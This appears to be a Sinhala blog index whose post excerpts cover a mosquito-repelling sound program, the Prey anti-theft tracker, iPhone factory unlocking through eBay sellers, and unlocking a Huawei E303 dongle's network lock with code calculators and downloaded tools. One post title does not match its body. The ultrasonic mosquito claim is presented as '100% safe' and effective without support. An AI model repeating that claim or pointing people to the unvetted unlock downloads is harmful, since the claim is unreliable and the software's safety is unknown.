ඔන්න අද මම ගෙනාවා වටින බාන්ඩයක්.. ඒක තමා WiNToBootic කියන්නේ.. මේකෙන් අපිට පුලුවන් තමන්ගේ පෙන් එකෙන් Windows Setup එක බූට් වෙන විදිහට හදා ගන්න..
by Avishka Vithanage · 0
ගූගල් search පාරක් ඩාලා බැලුව මෙන්න නියම බාන්ඩයක් සෙට් උනා මට..... පොඩි සොෆ්ට් කෑල්ලක්......මේක දෑවා විතරයි එකෙක් හොයාගන්ඩ බැරි උනා........
මෙක කියවපු ගමන් සමහරු බලයි පට්ටපල් බොරු මු මෙ කියන්නෙ කියල , නැ හොදෙ ..මෙක සිරා සින් එකක් ...මෙහෙමයි මෙකෙ සින් එක... එක එක සත්තුන්ට ඇහෙන ශබ්ද පරාසයන් තියනවනෙ , මෙවයින් අපිට ඇහෙන්නෙ නැති මදුරුවන්ට ඉන්ඩ බැරි ශබ්ද පරසයක් තමයි මෙකෙන් නිකුත් කරන්නෙ
12 khz -22 khz
මෙක ඔය මදුරු කොයිල් වල විස දුම වගෙ නෙවෙයි , අපෙ කන්වලට හො කිසිම විදිහකින් අපිට හානියක් කරන්නෙ නැහැ 100% සෞකය ආරක්ශිතයිලු ඔන් , එලනෙ ?....
මෙන්න සොෆ්ට් වෙයර් එක
Download
by Avishka Vithanage · 0
මං හිතුව ලැපක් අළුතෙන් ගන්න ඉන්න උන්ටයි, අරන් පාවිච්චි කරන උන්ටයි, ගන්න කලින් පොර ටොක්ස් දෙන මං වගේ උන්ටයි වැදගත් පොඩි සොෆ්ට්වෙයා කෑල්ලක් ගැන කියන්න.
පොඩි කිව්වට මේක මරු භාණ්ඩෙ. පොලිසියෙ වැඩේ ගෙදර ඉඳන් කරල ඔනෙමනම් හොරාව කන්ටැක්ට් පාරක් දාල ගෙදරටම භාන්ඩෙ ගෙන්න ගන්න පුළුවන්. දැනටමත් ඉතිං හුඟ දෙනෙක් දන්නව ඇති. කමක් නෑ නොදන්න උන් ටික දැනගත්තාවෙකො නේද?
හරි කයිය ගැහුව ඇති. සොෆ්ට්වෙයා එකේ නම තමයි PREY. ඔක්කොටම කලින් අපි බාගෙන ඉමුකො. ආහ් කියන්න අමතක උණා. මේක බරගානක් වෙනව. $ 00.00
පළමු ලින්ක් එකෙන් ගියාම PREY නොමිලේ ඔබේ ඩිවයිස් එකට භාගන්න අවශ්‍ය ලින්ක් එකත්, PREY නිවැරදිව උපාංගයේ පිහිටුවා ගන්න කියාදෙන වීඩියෝ එකට ලින්ක් එකත් දැකගන්න පුළුවන්.දෙවැනි ලින්ක් එකේ ඩිවයිස් එකට ගැලපෙන මෘදුකාංගය තෝරා ගන්න පුළුවන්. කැමති ලින්ක් එකකින් භාගන්න.
http://preyproject.com
http://preyproject.com/download
ඉන්සටෝල් කර ගැනීම, ඇක්ටිව් කර ගැනීම හා මෘදුකාංගය ක්‍රියාකරවීම ගැන තොරතුරු අතුලත් වීඩියෝ එක කලින් දාපු පළවෙනි ලින්ක් එකෙන් බලන්නත් පුළුවන්. එහෙම නැත්තන් පහළින් දාල තියෙන වීඩියෝ එකෙනුත් ඒ තොරතුරු බලාගන්න ඔබට පුළුවන්.
එහෙනම් මේකෙ තියෙන ඔප්ෂන්ස් ගැන පුංචි හැඳින්වීමක් මම කරන්නම්
Geo – මේක තමයි වැදගත්ම එක. ඩිවයිස් එකේ තියෙන GPS මඟින් සහ ළඟම ඇති Wi-Fi සර්වරය සමඟ සම්බන්ධ වී ඔයාගේ ලැප් එක හෝ ඇන්ඩ්‍රොයිඩ් ඩිවයිස් එක නැති උන වෙලේ සිට යන එන තැන් සියල්ලක්ම ඔබට රිපෝර්ට් වෙනව.
Network – මෙමඟින් සොරාගත් පුද්ගලයා විසින් භාවිතා කරනු ලබන අන්තර්ජාල සමබඳතා, IP ලිපිනයන්, සහ එම ඩිවයිස් එක මඟින් සම්බන්ධ වන Wi-Fi Access points වල විස්තර ලබාදෙනව.
Session – මෙයත් වැදගත්. මෙමඟින් සොරාගත් උපකරණයෙන් විවිධ කාල වලදී ලබාගන්නා Screen Shots, උපකරණයේ වෙනස් කරන ලද දත්ත වල තොරතුරු සහ එම උපකරණයේ Run වෙන Programs මොනවද යන්න දැනගත හැකිය.
WebCam – හා…හා… මේ තියෙන්නෙ භාණ්ඩෙ.දැං පේන බලන්න යන්න ඕනවෙන්නෙ නෑ.මෙමඟින් උපාංගය කියාත්මක කරනු ලබන අවස්ථාවේ සිට විටින් විට වෙබ් කැම් එක ආධාරයෙන් ස්වයංක්‍රීයව ඡායාරූප ගෙන එම ඡායරූප අප වෙත එවයි. ( උස්සපු එකා කට ඇරං දිව හපං ලැප් එකේ එව්ව මෙව්ව කොරන ෆොටෝස් ගොඩාක් එයි :පී)
මීට අමතරව තවත් වැදගත් ඔප්ෂන්ස් කීපයකුත් තියෙනව. ඒ තමයි
Alarm – හොරාට වැසිකිළී අවශ්‍යතාවය ඇතිවෙන විදියෙ වැඩක් තම මේක. විනාඩි 10න් 10ට පොලිස් සයිරන් එකක් වදිනව. හිහි සැප කනේ.ඔබට සොරා ළඟපාතක සිටීනම් සොරකම් කර විනාඩි 10ක් අතුලතදිම සොරාව අල්ලා ගැනීමට පුළුවන්.
Alert – මෙහිදී තමන්ට කැමති ඇලර්ට් එකක් මෙහි දැමීමෙන් විනාඩි 10න් 10ට සොරාගත් උපකරණයේ එය දිස්වෙනව. මේ ඇලර්ට් මැසේජ් එක කැමතිනං දාගන්ඩ
(සැ.යු : දැං ඉන්න හොරු සමහරවිට මේ සොෆ්ට්වෙයා එක ගැන දන්න නිසා මේ සයිරන් එක වදිද්දි සහ මේ ඇලර්ට් එක එද්දි මෙම සොෆ්ට්වෙයා එක පරිගණකයේ ඉන්ස්ටෝල් කර තිබෙන බව දැනගන්න පුළුවන්. ඒක අපිට විශාල අවාසියක් වෙන්නේ ඔහු සිස්ටම් නැවත දැම්මොත් ඉන්පසු අපට තොරතුරු ලබාගැනීමට නොහැකි වෙන හිංද )
Lock – මෙමඟින් පරිඝණකය ලොක් කර දැමීමට පුළුවන්
Secure- මේක නම් ඉතාමත් වැදගත්. මෙමඟින් තම පරිඝණකයේ තිබෙන පුද්ගලික තොරතුරු, විශේෂයෙන්ම ඊමේල් ගිණූම්, වෙබ් බ්‍රව්සර් මතකයන් සොරකම් කළ පුද්ගලයා අතට යෑමට නොදී වලක්වාගත හැකියි.
මෙම මෘදුකාංගය උපයෝගී කරගත් අවස්ථාවක් නරඹන්න
by Avishka Vithanage · 1
මුලින්ම කියන්න ඕනේ මේක ෆ්‍රී ෆැක්ට්‍රි අන්ලොක් කරන හැටි නම් නෙමෙයි. එහෙම ෆ්‍රී අන්ලොක් කරන විදිහක් නම් මම තවම දන්නේ නෑ.

ෆෝන් ශොප් වලත් කරන්නේ මේ ක්රමයම තමයි.
මේක කරන්න නම් අනිවාර්යෙන්ම ඔයාලා ලග ක්‍රෙඩිට් කාඩ් එකක් හරි ඔන්ලයින් ගෙවන්න පුලුවන් කඩ් එකක් තියෙන්න ඕන. නැත්නම් යාලුවෙක්ගෙන්
මුලින්ම ඔයාල දැනගෙන ඉන්න ඕන ඔයගේ ෆෝන් එක ඇත්තටම ලොක්ද කියලා. මොකද වෙන රටක ඉදලා Factory unlock ගෙනාවත් සමහර වෙලාවට අපෙ රටේ සිම් දැම්මට සිග්නල් පෙන්නන්නේ නෑ. මෙන්න මේ සයිට් එකට ගිහින් ඒක චෙක් කර ගන්න.
http://iphoneimei.info/
http://sickw.com/index.html
මුලින්ම ඔයාල දැනගෙන ඉන්න ඕන ඔයගේ ෆෝන් එක ගෙනාපු රට සහ පාවිච්චි කරපු නෙට්වර්ක් එක මොකක්ද කියලා. එහෙම දන්නෙ නැත්නම් මේ සයිට් එකෙන් දැන ගන්න වෙනවා.
http://www.unlockboot.com/2012/08/ho...l-carrier.html
හරි මේ තොරතුරු ඔක්කොම දන්නව නම් දැන් අපි වැඩේට බහිමු.
අපිට ෆැක්ට්‍රි උන්ලොක් කර ගද්දි විස්වසවන්තම හා පහසුම ඔයගොල්ලො දන්න වෙබ් Site එක තමයි ඊබේ එක.මොකද කියනවා නම් වැඩේ හරි නොගියොත් අපිට සල්ලි ආපහු ගන්න ක්‍රමේකුත් තියෙන්න එපැයි.
අපි උදාහරනයක් විදිහට ගමු iphone 4 එකක්. Network එක AT&Tකියලා හිතමු.
ඊට පස්සෙ අපි ebayඑකේ serch කරනව iphone 4 at&t factory unlock service කියලා.
http://www.ebay.com/sch/i.html?_odkw=at&t factory unlock service&_osacat=0&_from=R40&_trksid=p2045573.m570.l1313.TR2.TRC1. A0.Xiphone+4+at%26t+factory+unlock+service&_nkw=ip hone+4+at%26t+factory+unlock+service&_sacat=0
ඊට පස්සෙ ගෙවලා ඉවර වෙලා සෙලර්ට මැසේජ් එකක් දාන්න imei number එක එක්ක.
දවස් දෙක තුනකට පස්සෙ සෙලර් ඔයලට දායි ඔයගේ අන්ලොක් Comlete එක කියලා.
ඊට පස්සේ ඔයගේ ෆෝන් එක itune වලට connect කරලා Restore කරන්න. අවසානෙට මේ වගේ වැටෙයි.
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5L6A5_w5QnqiGw_KghIqo0wwnzht8BKR6Q_yn9MWvXV_Nry-RwOdeq54HgI7rPNU377wUfsjF7uE9ThkhVz1ysQQP0svb7cd8yBbdSES86HJx11vfDGzsmL7126SBQQTF70O-gFELz-4/s640/Factory-Unlock-iPhone-4-imei.jpg)
මෙන්න තව Factory unlock කරගන්න පුලුවන් web site කීපයක්.
http://www.officialiphoneunlock.co.uk/iphoneunlock.php
http://unlockiphonevip.com/?id=polltoolkit
factory unlock කරගන්න වියදම වැඩි කියලා හිතන අය Normal unlock එකක් කර ගන්න.
http://www.easyunlockingsolutions.co...FQhjpQod6H8AKQ
http://www.polltoolkit.com/
Avishka ( I tec GSM) Mobile hardware and software engineering

මේ දවස්වල නිතර අහන ප්‍රශ්ණයකට විසදුම් ලබාදීමට තමයි මේ සූදානම. . මේ දවස්වල ගොඩක් දෙනෙකුට තියෙන ප්‍රශ්ණය තමයි E303 Dongle එක Unlock කරගන්නෙ කොහොමද? කියලා, මෙය අන්ලොක් කරන්න එච්චර අමාරු නැහැ, අන්ලොක් කරගන්න නොදන්න එකයි ප්‍රශ්ණය. මම දැන් කියලා දෙන්නම් මේක කරන විදිහ.
මුලින්ම මේ ගැන මතක් කරන්නම්, මොකද අපි ගත්ත Dongle එකක් Lock කරලා තිබුනොත්, අපි ඒකට වෙනත් Network එකක SIM එකක් යොදාගෙන පාවිච්චි කරන්න බැහැනෙ, Dongle වලට එන්නෙ Network Lock එකක්, අපි මේක Unlock කලෙත් ඔයාට Dongle එකත් එකක් ලැබෙන වගකීම අහෝසි වෙනවා, මේ නිසා මෙය මතකේ තබාගෙන වැඩේ කරගමු.
මුලින්ම මේ ලින්කුවට ගිහින් unlock code එක ගන්න g+ click කරන්න
දැන් ඔයාගේ gmail එකේ විස්තර දීල log වෙන්න
දැන් මේක accept දෙන්න
මේකෙදි ඔයාලගේ dongle එකේ model එකයි IME number එකයි දීලා calculate කරන්න
දෙන තියෙන්නේ කැමතියි කියලා මේ button එක click කරන එක
දැන් ඔයාලට unlock code එක පෙන්නයි .මේකෙන් අපි ගන්න ඕන New Algo code එක.
දැන් තියෙන්නේ ඔයාලගේ dongle එකට වෙන network එකක sim එකක් දාලා massage එකක් ඒවි unlock code එක ඉල්ලලා අපි හොයාගත්ත New Algo code එක දෙන්න. unlock වෙලා තියේවි.
මතක තියාගන්න
mobile partner එක connect වෙන්නේ නැත්නම් අලුත් profile එකක් හදලා connect වෙන්න
Tools> options > Profile > Management > New

ඔයා අලුතෙන් ඩොන්ගල් එකක් ගත්තම එක Unlock කරන්න බයයි නේද'හදිස්සියෙවත් ඩොන්ගල් එකට මොනවා හරි උනොත් මාරු කරගන්න බැරිවෙයි කියල ඔන්න මම ඔයාලගේ ඒ ප්‍රශ්නෙටත් උත්තරයක් හොයාගත්ත මෙච්චරයි කරන්න තියෙන්නේ.
ඉස්සෙල්ලම මෙන්නේ මේ Software කැල්ල Download කරගෙන Install කරගෙන Run කරගන්න
ඊට පස්සේ Dongal එකට ඕනිම සිම් එකක් දාල Connect වෙන්න. දැන් ඔයාගේ ඩොන්ගල් එකට කිසි හානියක් නෑ .ඩොන්ගල් එක Unlock කරලත් නෑ එත් අපි ඕනි සිම් එකක් දාලා යනවා ඩොන්ගල් එකේ Warranty නැතිවෙන්නෙත් නෑ බයවෙන්න දේකුත් නෑ
Download
by Avishka Vithanage · 0
ඔන්න අද කියන්න යන්නෙ පහසුවෙන්ම ඔයාගෙ Dongle එක හරි යාලුවන්ගෙ Dongle එක හරි විනාඩියෙන් Unlock කරන ක්‍රමය......
කඩෙන් කරගන්න ගියොත් ඉතින් රුපියල් 500 වත් කඩාගන්නව නේ....මම දෑනට 50 ක් 60ක් ම Unlock කරලා තියෙන්නෙ....සොෆ්ට් එක සුපිරියට Run වෙනවා....
මුලින්ම මේ සොෆ්ට්වෙයා එක බාගන්න ....
Download
Download
දෑන් ඔයාගෙ Dongle එකේ EMEI කොඩ් එක Add කරන්න ඉන්පසු Unlock කෝඩ් එක අරගන්න දෑන් ඔයාලගෙ Dongle එකට වෙනත් වර්ගයේ SIM එකක් දාන්න....දාල Computer එකට Plug කරන්න ඉන්පසුව Input Unlock code කියල message එකක් එනවා එකට අර ඔයා කොපි කරපු කොඩ් එක දාලා Enter කරන්න..වෑඩේ finish....................

Subscribe to:
Posts (Atom)